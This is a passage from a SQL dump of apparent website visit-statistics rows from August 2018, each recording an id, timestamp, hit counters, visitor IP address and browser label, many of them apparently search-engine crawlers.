534753742,1,1,0,0,'54.36.148.123','other'),(291397,1534753761,1,1,0,0,'37.53.66.16','chrome'),(291398,1534753799,1,0,1,0,'66.249.66.155',''),(291399,1534753877,1,1,0,0,'178.92.164.144','firefox'),(291400,1534753933,1,1,0,0,'54.36.149.17','other'),(291401,1534754249,1,1,0,0,'54.36.148.225','other'),(291402,1534754257,1,1,0,0,'54.36.148.246','other'),(291403,1534754275,1,1,0,0,'141.8.142.74','other'),(291404,1534754320,1,1,0,0,'54.36.149.68','other'),(291405,1534754457,1,1,0,0,'54.36.148.120','other'),(291406,1534754483,1,1,0,0,'54.36.149.6','other'),(291407,1534754510,1,1,0,0,'54.36.148.237','other'),(291408,1534754645,1,1,0,0,'95.163.255.93','other'),(291409,1534754667,1,1,0,0,'54.36.149.30','other'),(291410,1534754730,1,1,0,0,'40.77.167.120','other'),(291411,1534754751,1,1,0,0,'91.196.178.94','firefox'),(291412,1534755369,1,1,0,0,'54.36.148.47','other'),(291413,1534755435,1,1,0,0,'54.36.148.68','other'),(291414,1534755500,1,1,0,0,'91.196.178.99','chrome'),(291415,1534755550,1,1,0,0,'54.36.148.247','other'),(291416,1534755787,1,1,0,0,'54.36.148.131','other'),(291417,1534755876,1,1,0,0,'91.196.177.178','chrome'),(291418,1534756152,1,1,0,0,'141.8.142.74','other'),(291419,1534756262,1,1,0,0,'54.36.149.52','other'),(291420,1534756287,1,1,0,0,'54.36.149.101','other'),(291421,1534756305,2,2,0,0,'82.207.121.233','chrome'),(291422,1534756548,1,1,0,0,'66.249.66.155','chrome'),(291423,1534756667,1,1,0,0,'54.36.149.20','other'),(291424,1534756828,1,1,0,0,'66.249.66.74','chrome'),(291425,1534757012,1,1,0,0,'54.36.149.48','other'),(291426,1534757198,1,1,0,0,'54.36.148.224','other'),(291427,1534757235,1,1,0,0,'178.93.236.168','chrome'),(291428,1534757289,1,1,0,0,'54.36.148.154','other'),(291429,1534757332,1,1,0,0,'178.154.171.88','other'),(291430,1534757518,1,1,0,0,'54.36.148.140','other'),(291431,1534757882,2,2,0,0,'157.55.39.77','other'),(291432,1534757908,1,1,0,0,'54.36.149.59','other'),(291433,1534758025,1,1,0,0,'54.36.149.78','other'),(291434,1534758134,1,1,0,0,'54.36.148.40','other'),(291435,1534758141,1,1,0,0,'54.36.148.23','other'),(291436,1534758159,1,1,0,0,'54.36.148.215','other'),(291437,1534758246,1,1,0,0,'54.36.148.250','other'),(291438,1534758331,1,1,0,0,'54.36.148.124','other'),(291439,1534758338,1,1,0,0,'54.36.149.74','other'),(291440,1534758348,1,1,0,0,'91.196.178.70','firefox'),(291441,1534758569,1,1,0,0,'54.36.148.165','other'),(291442,1534758656,1,1,0,0,'216.244.66.241','other'),(291443,1534758999,1,1,0,0,'54.36.149.102','other'),(291444,1534759141,1,1,0,0,'40.77.167.120','other'),(291445,1534759169,1,1,0,0,'54.36.148.26','other'),(291446,1534759289,1,1,0,0,'54.36.148.104','other'),(291447,1534759681,1,1,0,0,'54.36.149.13','other'),(291448,1534759707,1,1,0,0,'46.211.125.43','chrome'),(291449,1534760082,1,1,0,0,'54.36.148.96','other'),(291450,1534760146,1,1,0,0,'54.36.148.123','other'),(291451,1534760494,1,1,0,0,'54.36.148.198','other'),(291452,1534760543,1,0,1,0,'66.249.66.157',''),(291453,1534760567,1,1,0,0,'95.163.255.168','other'),(291454,1534760587,1,1,0,0,'54.36.148.129','other'),(291455,1534760794,1,0,1,0,'66.249.66.74',''),(291456,1534760802,1,0,1,0,'66.249.66.75',''),(291457,1534760858,1,1,0,0,'54.36.148.236','other'),(291458,1534761464,1,1,0,0,'130.180.219.29','chrome'),(291459,1534761700,1,1,0,0,'54.36.148.174','other'),(291460,1534761750,1,1,0,0,'66.249.66.156','chrome'),(291461,1534761879,1,1,0,0,'54.36.148.200','other'),(291462,1534762111,1,1,0,0,'141.8.142.74','other'),(291463,1534762545,1,1,0,0,'54.36.148.183','other'),(291464,1534762786,1,1,0,0,'54.36.148.69','other'),(291465,1534763006,1,1,0,0,'54.36.148.189','other'),(291466,1534763039,1,1,0,0,'54.36.148.198','other'),(291467,1534763059,1,1,0,0,'54.36.149.84','other'),(291468,1534763597,1,1,0,0,'54.36.148.148','other'),(291469,1534763901,1,1,0,0,'54.36.148.136','other'),(291470,1534763987,1,1,0,0,'54.36.148.157','other'),(291471,1534764004,1,1,0,0,'54.36.148.116','other'),(291472,1534764109,1,1,0,0,'54.36.148.194','other'),(291473,1534764128,1,1,0,0,'54.36.148.251','other'),(291474,1534764306,1,1,0,0,'54.36.148.218','other'),(291475,1534764410,1,1,0,0,'8.29.198.26','other'),(291476,1534764692,1,1,0,0,'54.36.148.139','other'),(291477,1534764782,2,2,0,0,'91.196.179.134','chrome'),(291478,1534765296,1,1,0,0,'95.163.255.115','other'),(291479,1534765449,3,3,0,0,'46.201.241.5','chrome'),(291480,1534765558,1,1,0,0,'54.36.148.47','other'),(291481,1534765571,1,1,0,0,'91.196.177.46','chrome'),(291482,1534765580,1,1,0,0,'54.36.149.27','other'),(291483,1534765587,1,1,0,0,'66.249.66.75','chrome'),(291484,1534765681,1,1,0,0,'91.229.121.2','opera'),(291485,1534765727,1,1,0,0,'54.36.148.30','other'),(291486,1534765801,1,1,0,0,'54.36.148.52','other'),(291487,1534765803,1,1,0,0,'54.36.148.241','other'),(291488,1534765889,1,1,0,0,'54.36.148.238','other'),(291489,1534766193,1,1,0,0,'54.36.148.45','other'),(291490,1534766222,1,1,0,0,'54.36.148.61','other'),(291491,1534766283,1,1,0,0,'54.36.148.221','other'),(291492,1534766331,1,1,0,0,'54.36.148.228','other'),(291493,1534766657,1,1,0,0,'54.36.148.90','other'),(291494,1534766726,2,2,0,0,'141.8.142.74','other'),(291495,1534766733,3,0,3,0,'66.249.66.75',''),(291496,1534766734,4,4,0,0,'216.244.66.241','other'),(291497,1534766840,1,1,0,0,'199.58.86.211','other'),(291498,1534766939,1,1,0,0,'54.36.149.53','other'),(291499,1534767355,1,1,0,0,'207.46.13.16','other'),(291500,1534767377,1,1,0,0,'54.36.149.84','other'),(291501,1534767559,1,1,0,0,'54.36.148.118','other'),(291502,1534767762,1,1,0,0,'95.132.23.175','firefox'),(291503,1534767829,1,1,0,0,'54.36.148.140','other'),(291504,1534767954,1,1,0,0,'54.36.148.69','other'),(291505,1534767999,1,1,0,0,'54.36.148.24','other'),(291506,1534768183,1,1,0,0,'54.36.148.226','other'),(291507,1534769246,1,0,1,0,'66.249.66.157',''),(291508,1534769255,1,1,0,0,'54.36.148.96','other'),(291509,1534769510,1,1,0,0,'54.36.148.126','other'),(291510,1534769585,2,2,0,0,'54.36.149.101','other'),(291511,1534769592,1,1,0,0,'54.36.148.243','other'),(291512,1534769660,1,1,0,0,'91.196.178.70','firefox'),(291513,1534769687,1,1,0,0,'54.36.148.194','other'),(291514,1534769807,1,1,0,0,'54.36.148.185','other'),(291515,1534769999,1,1,0,0,'54.36.148.12','other'),(291516,1534770131,1,1,0,0,'87.250.224.46','other'),(291517,1534770226,1,1,0,0,'54.36.148.211','other'),(291518,1534770249,1,1,0,0,'54.36.148.135','other'),(291519,1534770312,1,1,0,0,'54.36.148.192','other'),(291520,1534770346,1,1,0,0,'40.77.167.59','other'),(291521,1534770360,1,1,0,0,'40.77.167.120','other'),(291522,1534770491,1,1,0,0,'54.36.149.33','other'),(291523,1534770516,1,1,0,0,'31.43.31.187','chrome'),(291524,1534770801,1,1,0,0,'54.36.149.66','other'),(291525,1534770916,1,1,0,0,'54.36.148.85','other'),(291526,1534770984,1,1,0,0,'54.36.148.46','other'),(291527,1534771495,1,1,0,0,'54.36.148.215','other'),(291528,1534771497,1,1,0,0,'54.36.149.35','other'),(291529,1534771554,1,1,0,0,'54.36.148.193','other'),(291530,1534771647,1,1,0,0,'54.36.149.52','other'),(291531,1534771735,1,1,0,0,'54.36.148.111','other'),(291532,1534772023,1,1,0,0,'54.36.149.68','other'),(291533,1534772042,1,1,0,0,'54.36.149.16','other'),(291534,1534772189,1,1,0,0,'54.36.149.91','other'),(291535,1534772406,1,1,0,0,'91.196.178.81','firefox'),(291536,1534772451,1,1,0,0,'141.8.142.74','other'),(291537,1534772685,1,1,0,0,'54.36.149.49','other'),(291538,1534772908,2,2,0,0,'194.187.216.34','chrome'),(291539,1534772974,1,1,0,0,'54.36.149.21','other'),(291540,1534773021,1,1,0,0,'54.36.148.246','other'),(291541,1534773197,1,1,0,0,'54.36.148.133','other'),(291542,1534773335,1,1,0,0,'54.36.149.86','other'),(291543,1534773368,3,3,0,0,'141.8.142.74','other'),(291544,1534773421,2,2,0,0,'54.36.148.24','other'),(291545,1534773540,1,1,0,0,'54.36.148.17','other'),(291546,1534773626,1,1,0,0,'207.46.13.16','other'),(291547,1534773639,1,1,0,0,'40.77.167.120','other'),(291548,1534773747,1,1,0,0,'54.36.148.197','other'),(291549,1534773932,1,1,0,0,'54.36.148.176','other'),(291550,1534774207,1,1,0,0,'54.36.148.217','other'),(291551,1534774254,1,1,0,0,'54.36.148.33','other'),(291552,1534774329,1,1,0,0,'54.36.148.247','other'),(291553,1534774354,1,1,0,0,'54.36.148.208','other'),(291554,1534774359,1,1,0,0,'54.36.148.179','other'),(291555,1534774494,2,2,0,0,'216.244.66.241','other'),(291556,1534774619,2,0,2,0,'66.249.66.156',''),(291557,1534774686,1,1,0,0,'54.36.148.237','other'),(291558,1534774759,1,1,0,0,'54.36.148.98','other'),(291559,1534774771,1,1,0,0,'54.36.149.27','other'),(291560,1534774873,1,1,0,0,'54.36.149.71','other'),(291561,1534774944,1,1,0,0,'54.36.148.41','other'),(291562,1534775116,1,1,0,0,'40.77.167.59','other'),(291563,1534775240,1,1,0,0,'8.29.198.26','other'),(291564,1534775251,1,1,0,0,'54.36.148.204','other'),(291565,1534775376,1,1,0,0,'54.36.149.36','other'),(291566,1534775482,1,1,0,0,'54.36.149.88','other'),(291567,1534775744,1,1,0,0,'40.77.167.120','other'),(291568,1534775836,1,1,0,0,'54.36.148.15','other'),(291569,1534775917,1,1,0,0,'54.36.148.216','other'),(291570,1534775931,1,1,0,0,'54.36.148.79','other'),(291571,1534776021,1,1,0,0,'54.36.148.241','other'),(291572,1534776093,1,1,0,0,'95.163.255.176','other'),(291573,1534776128,1,1,0,0,'54.36.148.249','other'),(291574,1534776266,1,1,0,0,'141.8.142.74','other'),(291575,1534776372,1,1,0,0,'54.36.148.232','other'),(291576,1534776383,1,1,0,0,'54.36.148.189','other'),(291577,1534776516,1,1,0,0,'54.36.148.214','other'),(291578,1534776654,1,1,0,0,'54.36.148.33','other'),(291579,1534776720,1,1,0,0,'54.36.149.87','other'),(291580,1534776789,1,1,0,0,'54.36.149.88','other'),(291581,1534777032,1,1,0,0,'54.36.149.70','other'),(291582,1534777104,1,1,0,0,'54.36.148.130','other'),(291583,1534777301,1,1,0,0,'54.36.148.142','other'),(291584,1534777610,1,1,0,0,'54.36.148.62','other'),(291585,1534777695,1,1,0,0,'188.230.43.254','other'),(291586,1534777707,1,1,0,0,'178.154.171.88','other'),(291587,1534778063,1,1,0,0,'54.36.148.190','other'),(291588,1534778464,1,1,0,0,'54.36.149.66','other'),(291589,1534778773,1,1,0,0,'54.36.148.130','other'),(291590,1534778875,1,1,0,0,'178.154.171.88','other'),(291591,1534778935,1,1,0,0,'54.36.149.52','other'),(291592,1534779001,1,1,0,0,'54.36.149.39','other'),(291593,1534779114,1,1,0,0,'54.36.149.53','other'),(291594,1534779273,1,1,0,0,'54.36.148.94','other'),(291595,1534779432,1,1,0,0,'141.8.142.74','other'),(291596,1534779744,1,1,0,0,'54.36.149.60','other'),(291597,1534779801,1,1,0,0,'54.36.149.19','other'),(291598,1534780091,1,1,0,0,'54.36.149.51','other'),(291599,1534780108,1,1,0,0,'188.230.43.254','other'),(291600,1534780244,1,1,0,0,'54.36.148.238','other'),(291601,1534780399,1,1,0,0,'54.36.148.137','other'),(291602,1534780458,1,1,0,0,'66.249.66.75','chrome'),(291603,1534780498,1,1,0,0,'66.249.66.155','chrome'),(291604,1534780502,1,1,0,0,'54.36.148.102','other'),(291605,1534780713,1,1,0,0,'178.154.171.88','other'),(291606,1534781166,1,1,0,0,'54.36.148.224','other'),(291607,1534781173,1,1,0,0,'54.36.148.195','other'),(291608,1534781475,1,1,0,0,'40.77.167.120','other'),(291609,1534781617,1,1,0,0,'87.250.224.46','other'),(291610,1534781708,1,1,0,0,'54.36.148.204','other'),(291611,1534781735,1,1,0,0,'54.36.149.10','other'),(291612,1534782201,1,1,0,0,'54.36.148.114','other'),(291613,1534782300,1,1,0,0,'216.244.66.241','other'),(291614,1534782452,1,1,0,0,'54.36.149.105','other'),(291615,1534782508,1,1,0,0,'188.230.43.254','other'),(291616,1534782788,1,1,0,0,'141.8.142.74','other'),(291617,1534783017,2,0,2,0,'66.249.66.156',''),(291618,1534783084,1,1,0,0,'54.36.148.46','other'),(291619,1534783109,1,1,0,0,'87.250.224.46','other'),(291620,1534783487,1,1,0,0,'92.113.189.235','chrome'),(291621,1534783522,1,1,0,0,'54.36.148.145','other'),(291622,1534783707,1,1,0,0,'54.36.148.235','other'),(291623,1534783748,1,1,0,0,'54.36.148.216','other'),(291624,1534784013,1,1,0,0,'91.196.178.83','chrome'),(291625,1534784075,1,1,0,0,'54.36.148.112','other'),(291626,1534784085,1,1,0,0,'54.36.148.248','other'),(291627,1534784155,1,1,0,0,'54.36.149.15','other'),(291628,1534784220,1,1,0,0,'54.36.148.70','other'),(291629,1534784390,1,1,0,0,'54.36.148.215','other'),(291630,1534784618,1,1,0,0,'95.163.255.109','other'),(291631,1534784892,1,1,0,0,'188.230.43.254','other'),(291632,1534785090,1,1,0,0,'54.36.149.13','other'),(291633,1534785111,1,1,0,0,'54.36.148.39','other'),(291634,1534785198,1,1,0,0,'54.36.148.193','other'),(291635,1534785199,1,1,0,0,'54.36.148.15','other'),(291636,1534785383,1,1,0,0,'216.244.66.241','other'),(291637,1534785450,1,1,0,0,'54.36.149.0','other'),(291638,1534785484,1,1,0,0,'54.36.148.183','other'),(291639,1534785759,1,1,0,0,'54.36.148.13','other'),(291640,1534785819,1,1,0,0,'54.36.148.136','other'),(291641,1534785836,1,1,0,0,'54.36.148.186','other'),(291642,1534785878,1,1,0,0,'54.36.148.57','other'),(291643,1534785886,1,1,0,0,'141.8.142.74','other'),(291644,1534785989,1,1,0,0,'54.36.148.71','other'),(291645,1534786043,1,1,0,0,'54.36.148.205','other'),(291646,1534786077,1,1,0,0,'8.29.198.27','other'),(291647,1534786145,1,1,0,0,'54.36.149.99','other'),(291648,1534786192,1,1,0,0,'54.36.148.246','other'),(291649,1534786595,1,1,0,0,'54.36.149.92','other'),(291650,1534786630,1,1,0,0,'54.36.149.45','other'),(291651,1534786972,1,1,0,0,'66.249.66.75','chrome'),(291652,1534786987,1,1,0,0,'66.249.66.157','chrome'),(291653,1534787108,1,1,0,0,'54.36.148.145','other'),(291654,1534787514,1,1,0,0,'54.36.149.37','other'),(291655,1534787554,1,1,0,0,'54.36.148.198','other'),(291656,1534787663,1,1,0,0,'87.250.224.46','other'),(291657,1534787724,1,1,0,0,'54.36.148.240','other'),(291658,1534787777,1,1,0,0,'178.154.171.88','other'),(291659,1534787849,1,0,1,0,'66.249.66.155',''),(291660,1534787965,1,1,0,0,'54.36.149.95','other'),(291661,1534788117,1,1,0,0,'54.36.148.159','other'),(291662,1534788474,1,1,0,0,'54.36.148.64','other'),(291663,1534788485,1,1,0,0,'54.36.148.97','other'),(291664,1534788507,1,1,0,0,'54.36.148.86','other'),(291665,1534788558,1,1,0,0,'54.36.148.251','other'),(291666,1534788653,1,1,0,0,'93.77.57.125','chrome'),(291667,1534788714,1,1,0,0,'54.36.148.154','other'),(291668,1534788896,1,1,0,0,'54.36.148.94','other'),(291669,1534788965,1,1,0,0,'54.36.148.50','other'),(291670,1534789028,2,0,2,0,'66.249.66.59',''),(291671,1534789136,1,0,1,0,'66.249.66.61',''),(291672,1534789249,1,1,0,0,'46.249.171.159','chrome'),(291673,1534789666,2,2,0,0,'54.36.148.155','other'),(291674,1534789887,1,1,0,0,'54.36.148.168','other'),(291675,1534790068,1,1,0,0,'54.36.148.57','other'),(291676,1534790170,1,1,0,0,'54.36.148.35','other'),(291677,1534790431,1,1,0,0,'54.36.149.16','other'),(291678,1534790605,1,1,0,0,'54.36.148.175','other'),(291679,1534790624,1,1,0,0,'54.36.148.132','other'),(291680,1534790745,1,1,0,0,'40.77.167.59','other'),(291681,1534791056,1,1,0,0,'54.36.148.153','other'),(291682,1534791121,1,1,0,0,'54.36.148.80','other'),(291683,1534791190,1,0,1,0,'66.249.66.61',''),(291684,1534791364,1,1,0,0,'54.36.149.82','other'),(291685,1534791421,1,1,0,0,'54.36.148.96','other'),(291686,1534791473,2,2,0,0,'54.36.149.60','other'),(291687,1534791502,1,1,0,0,'54.36.148.16','other'),(291688,1534791710,1,0,1,0,'66.249.66.155',''),(291689,1534791813,1,1,0,0,'54.36.149.69','other'),(291690,1534792058,1,1,0,0,'216.244.66.241','other'),(291691,1534792165,1,1,0,0,'54.36.148.31','other'),(291692,1534792318,1,1,0,0,'141.8.142.74','other'),(291693,1534792602,2,2,0,0,'54.36.148.243','other'),(291694,1534792718,1,1,0,0,'66.249.66.57','chrome'),(291695,1534792722,1,1,0,0,'66.249.66.156','chrome'),(291696,1534792724,1,1,0,0,'54.36.148.107','other'),(291697,1534792726,1,1,0,0,'54.36.148.192','other'),(291698,1534792836,1,1,0,0,'54.36.148.162','other'),(291699,1534792956,1,1,0,0,'54.36.148.94','other'),(291700,1534792993,1,1,0,0,'54.36.149.107','other'),(291701,1534793041,1,1,0,0,'78.111.189.218','chrome'),(291702,1534793068,1,1,0,0,'54.36.148.154','other'),(291703,1534793084,1,1,0,0,'54.36.148.237','other'),(291704,1534793392,1,1,0,0,'54.36.148.25','other'),(291705,1534793868,1,1,0,0,'54.36.148.46','other'),(291706,1534793960,1,1,0,0,'54.36.148.14','other'),(291707,1534794099,1,1,0,0,'141.8.142.74','other'),(291708,1534794309,1,1,0,0,'54.36.148.185','other'),(291709,1534794529,1,1,0,0,'54.36.148.92','other'),(291710,1534794616,1,1,0,0,'40.77.167.43','other'),(291711,1534794798,1,1,0,0,'54.36.149.49','other'),(291712,1534795026,1,1,0,0,'142.93.183.32','chrome'),(291713,1534795197,1,1,0,0,'141.8.142.74','other'),(291714,1534795241,1,1,0,0,'216.244.66.241','other'),(291715,1534795320,1,1,0,0,'54.36.148.96','other'),(291716,1534795359,1,1,0,0,'54.36.149.35','other'),(291717,1534795391,1,1,0,0,'54.36.149.100','other'),(291718,1534795815,1,1,0,0,'54.36.148.242','other'),(291719,1534796180,1,1,0,0,'66.102.9.136','chrome'),(291720,1534796200,1,1,0,0,'66.102.9.134','chrome'),(291721,1534796211,1,1,0,0,'66.102.9.26','chrome'),(291722,1534796301,13,13,0,0,'40.77.167.120','other'),(291723,1534796314,10,10,0,0,'207.46.13.95','other'),(291724,1534796323,9,9,0,0,'40.77.167.59','other'),(291725,1534796365,13,13,0,0,'40.77.167.43','other'),(291726,1534796522,1,0,1,0,'66.249.66.157',''),(291727,1534796793,1,1,0,0,'91.196.178.86','other'),(291728,1534796905,1,1,0,0,'54.36.148.90','other'),(291729,1534796918,1,1,0,0,'8.29.198.27','other'),(291730,1534797609,1,1,0,0,'66.249.66.59','chrome'),(291731,1534797610,1,1,0,0,'66.249.66.155','chrome'),(291732,1534797723,1,0,1,0,'66.249.66.156',''),(291733,1534798174,1,1,0,0,'54.36.148.195','other'),(291734,1534798730,1,1,0,0,'40.77.167.120','other'),(291735,1534798809,1,1,0,0,'54.36.148.160','other'),(291736,1534799026,1,1,0,0,'54.36.148.56','other'),(291737,1534799226,1,1,0,0,'54.36.148.92','other'),(291738,1534799389,1,1,0,0,'54.36.148.57','other'),(291739,1534799390,1,1,0,0,'54.36.148.237','other'),(291740,1534799429,1,1,0,0,'54.36.148.118','other'),(291741,1534799433,1,1,0,0,'54.36.149.64','other'),(291742,1534799568,1,1,0,0,'54.36.149.55','other'),(291743,1534799625,1,1,0,0,'54.36.148.215','other'),(291744,1534799784,1,1,0,0,'54.36.148.70','other'),(291745,1534799943,1,1,0,0,'54.36.148.167','other'),(291746,1534799947,1,1,0,0,'178.154.171.88','other'),(291747,1534799999,2,2,0,0,'141.8.142.74','other'),(291748,1534800038,1,1,0,0,'54.36.148.238','other'),(291749,1534800113,1,1,0,0,'54.36.149.83','other'),(291750,1534800349,1,1,0,0,'54.36.148.183','other'),(291751,1534800556,1,1,0,0,'216.244.66.241','other'),(291752,1534800586,1,1,0,0,'54.36.148.93','other'),(291753,1534800671,2,0,2,0,'66.249.66.157',''),(291754,1534800714,1,1,0,0,'54.36.148.49','other'),(291755,1534800798,1,1,0,0,'207.46.13.95','other'),(291756,1534801174,1,1,0,0,'54.36.149.62','other'),(291757,1534801550,1,1,0,0,'54.36.149.107','other'),(291758,1534801551,1,1,0,0,'54.36.149.49','other'),(291759,1534801566,1,1,0,0,'54.36.148.242','other'),(291760,1534801807,1,1,0,0,'54.36.149.68','other'),(291761,1534801837,1,0,1,0,'66.249.66.156',''),(291762,1534801855,1,1,0,0,'54.36.148.86','other'),(291763,1534801946,1,1,0,0,'54.36.148.125','other'),(291764,1534802012,1,1,0,0,'54.36.149.90','other'),(291765,1534802127,1,1,0,0,'54.36.148.131','other'),(291766,1534802206,1,0,1,0,'66.249.66.59',''),(291767,1534802452,1,1,0,0,'54.36.148.81','other'),(291768,1534802690,1,1,0,0,'40.77.167.120','other'),(291769,1534802795,1,0,1,0,'66.249.66.157',''),(291770,1534802877,1,1,0,0,'216.244.66.241','other'),(291771,1534803322,1,1,0,0,'54.36.148.68','other'),(291772,1534803345,1,1,0,0,'40.77.167.43','other'),(291773,1534803574,1,1,0,0,'66.249.66.61','chrome'),(291774,1534803761,1,1,0,0,'66.249.66.156','chrome'),(291775,1534803919,1,1,0,0,'46.211.201.223','other'),(291776,1534804373,1,0,1,0,'66.249.66.155',''),(291777,1534804869,1,1,0,0,'54.36.148.115','other'),(291778,1534805064,1,1,0,0,'178.154.171.88','other'),(291779,1534805083,1,0,1,0,'66.249.66.156',''),(291780,1534805164,1,1,0,0,'141.8.142.74','other'),(291781,1534805193,1,1,0,0,'54.36.149.50','other'),(291782,1534805266,1,1,0,0,'54.36.149.105','other'),(291783,1534805386,1,0,1,0,'66.249.66.155',''),(291784,1534805812,1,1,0,0,'54.36.148.233','other'),(291785,1534806025,1,1,0,0,'54.36.149.93','other'),(291786,1534806380,1,1,0,0,'54.36.148.236','other'),(291787,1534806405,1,1,0,0,'178.154.171.88','other'),(291788,1534806747,1,1,0,0,'54.36.149.65','other'),(291789,1534806760,1,1,0,0,'54.36.148.170','other'),(291790,1534806964,1,0,1,0,'66.249.66.155',''),(291791,1534807011,1,1,0,0,'54.36.148.235','other'),(291792,1534807053,1,1,0,0,'54.36.149.26','other'),(291793,1534807066,1,1,0,0,'54.36.148.39','other'),(291794,1534807186,1,0,1,0,'66.249.66.156',''),(291795,1534807365,1,1,0,0,'54.36.149.46','other'),(291796,1534807415,2,2,0,0,'141.8.142.74','other'),(291797,1534807472,1,1,0,0,'54.36.148.212','other'),(291798,1534807754,1,1,0,0,'54.36.148.78','other'),(291799,1534807758,1,1,0,0,'8.29.198.25','other'),(291800,1534807893,1,1,0,0,'54.36.148.89','other'),(291801,1534808046,1,1,0,0,'40.77.167.120','other'),(291802,1534808722,1,1,0,0,'54.36.149.94','other'),(291803,1534808853,1,0,1,0,'66.249.66.156',''),(291804,1534808984,1,1,0,0,'54.36.148.51','other'),(291805,1534809038,1,1,0,0,'141.8.142.74','other'),(291806,1534809041,1,1,0,0,'37.9.113.115','other'),(291807,1534809342,1,1,0,0,'54.36.148.75','other'),(291808,1534809361,1,1,0,0,'66.249.66.57','chrome'),(291809,1534809592,1,1,0,0,'54.36.149.62','other'),(291810,1534809674,1,1,0,0,'54.36.148.93','other'),(291811,1534810143,1,0,1,0,'66.249.66.157',''),(291812,1534811026,1,1,0,0,'54.36.149.29','other'),(291813,1534811084,1,1,0,0,'54.36.148.94','other'),(291814,1534811293,1,1,0,0,'54.36.148.29','other'),(291815,1534811671,1,1,0,0,'54.36.149.35','other'),(291816,1534811775,1,1,0,0,'54.36.149.73','other'),(291817,1534811926,1,1,0,0,'37.9.113.182','other'),(291818,1534811957,1,1,0,0,'193.106.30.99','firefox'),(291819,1534812143,1,1,0,0,'54.36.148.158','other'),(291820,1534812335,1,1,0,0,'54.36.149.107','other'),(291821,1534812528,1,1,0,0,'54.36.148.104','other'),(291822,1534813032,1,1,0,0,'54.36.148.254','other'),(291823,1534813046,1,1,0,0,'54.36.148.250','other'),(291824,1534813106,1,1,0,0,'54.36.149.12','other'),(291825,1534813470,1,0,1,0,'66.249.66.157',''),(291826,1534813582,1,1,0,0,'54.36.149.27','other'),(291827,1534813606,1,1,0,0,'66.249.66.156','chrome'),(291828,1534813624,1,1,0,0,'54.36.148.225','other'),(291829,1534813708,1,1,0,0,'178.154.171.88','other'),(291830,1534813733,1,1,0,0,'66.249.66.61','chrome'),(291831,1534813823,1,1,0,0,'54.36.148.54','other'),(291832,1534813972,1,1,0,0,'54.36.148.55','other'),(291833,1534813985,1,1,0,0,'54.36.148.27','other'),(291834,1534814114,1,1,0,0,'54.36.148.108','other'),(291835,1534814266,1,1,0,0,'54.36.148.164','other'),(291836,1534814381,1,1,0,0,'54.36.148.13','other'),(291837,1534814427,1,1,0,0,'54.36.149.47','other'),(291838,1534814522,1,1,0,0,'54.36.148.24','other'),(291839,1534814654,1,1,0,0,'54.36.148.170','other'),(291840,1534814839,1,1,0,0,'54.36.149.38','other'),(291841,1534814894,1,1,0,0,'54.36.148.115','other'),(291842,1534814985,1,1,0,0,'54.36.148.247','other'),(291843,1534815104,1,1,0,0,'216.244.66.241','other'),(291844,1534815435,1,1,0,0,'54.36.149.4','other'),(291845,1534815500,1,1,0,0,'141.8.142.74','other'),(291846,1534816005,1,1,0,0,'54.36.148.13','other'),(291847,1534816459,2,2,0,0,'141.8.142.74','other'),(291848,1534816560,1,1,0,0,'54.36.149.78','other'),(291849,1534816807,1,1,0,0,'54.36.148.47','other'),(291850,1534816973,1,0,1,0,'66.249.66.157',''),(291851,1534817189,1,1,0,0,'54.36.149.24','other'),(291852,1534817335,1,0,1,0,'66.249.66.155',''),(291853,1534817575,1,1,0,0,'54.36.149.70','other'),(291854,1534817577,1,1,0,0,'54.36.148.25','other'),(291855,1534817691,1,1,0,0,'54.36.148.39','other'),(291856,1534817748,1,1,0,0,'54.36.148.85','other'),(291857,1534818146,1,1,0,0,'54.36.149.5','other'),(291858,1534818202,1,1,0,0,'54.36.148.12','other'),(291859,1534818418,1,1,0,0,'54.36.148.38','other'),(291860,1534818445,1,1,0,0,'54.36.148.136','other'),(291861,1534818590,1,1,0,0,'8.29.198.25','other'),(291862,1534818600,1,1,0,0,'54.36.148.32','other'),(291863,1534818699,1,1,0,0,'54.36.149.21','other'),(291864,1534818757,2,0,2,0,'66.249.66.156',''),(291865,1534818957,2,0,2,0,'66.249.66.155',''),(291866,1534818973,1,1,0,0,'54.36.148.135','other'),(291867,1534819043,1,1,0,0,'52.41.211.72','chrome'),(291868,1534819078,1,1,0,0,'54.36.149.90','other'),(291869,1534819183,1,1,0,0,'54.36.148.120','other'),(291870,1534819378,2,2,0,0,'141.8.142.74','other'),(291871,1534819392,1,1,0,0,'66.249.66.155','chrome'),(291872,1534819417,1,1,0,0,'66.249.66.57','chrome'),(291873,1534819509,1,1,0,0,'54.36.148.104','other'),(291874,1534819634,1,1,0,0,'54.36.148.11','other'),(291875,1534820259,1,1,0,0,'54.36.148.90','other'),(291876,1534820272,1,0,1,0,'66.249.66.157',''),(291877,1534820305,2,0,2,0,'66.249.66.155',''),(291878,1534820373,1,1,0,0,'54.36.148.143','other'),(291879,1534820443,1,1,0,0,'144.76.4.41','other'),(291880,1534820518,2,2,0,0,'144.76.96.236','other'),(291881,1534820525,1,1,0,0,'54.36.148.47','other'),(291882,1534820598,2,0,2,0,'66.249.66.156',''),(291883,1534821383,1,1,0,0,'95.163.255.95','other'),(291884,1534821764,1,1,0,0,'178.154.171.88','other'),(291885,1534821785,1,1,0,0,'141.8.142.74','other'),(291886,1534822665,2,2,0,0,'216.244.66.241','other'),(291887,1534822695,1,1,0,0,'54.36.149.80','other'),(291888,1534822738,1,1,0,0,'178.154.171.88','other'),(291889,1534823540,1,1,0,0,'54.36.149.21','other'),(291890,1534823594,2,2,0,0,'95.213.141.126','opera'),(291891,1534823877,1,1,0,0,'54.36.148.158','other'),(291892,1534824170,1,0,1,0,'66.249.66.156',''),(291893,1534824198,1,0,1,0,'66.249.66.61',''),(291894,1534824461,1,1,0,0,'54.36.149.41','other'),(291895,1534824464,1,1,0,0,'54.36.148.233','other'),(291896,1534824586,1,1,0,0,'40.77.167.120','other'),(291897,1534824662,1,1,0,0,'54.36.149.19','other'),(291898,1534824695,1,1,0,0,'54.36.148.142','other'),(291899,1534824859,3,3,0,0,'178.154.171.88','other'),(291900,1534824866,1,1,0,0,'66.249.66.156','chrome'),(291901,1534824870,1,1,0,0,'66.249.66.57','chrome'),(291902,1534824933,2,2,0,0,'141.8.142.74','other'),(291903,1534824945,1,1,0,0,'54.36.148.98','other'),(291904,1534825033,1,1,0,0,'87.250.224.46','other'),(291905,1534825036,1,1,0,0,'37.9.113.101','other'),(291906,1534825093,1,1,0,0,'54.36.149.77','other'),(291907,1534825234,1,1,0,0,'54.36.148.145','other'),(291908,1534825655,1,1,0,0,'54.36.149.64','other'),(291909,1534825665,1,1,0,0,'54.36.149.86','other'),(291910,1534825707,1,1,0,0,'54.36.148.59','other'),(291911,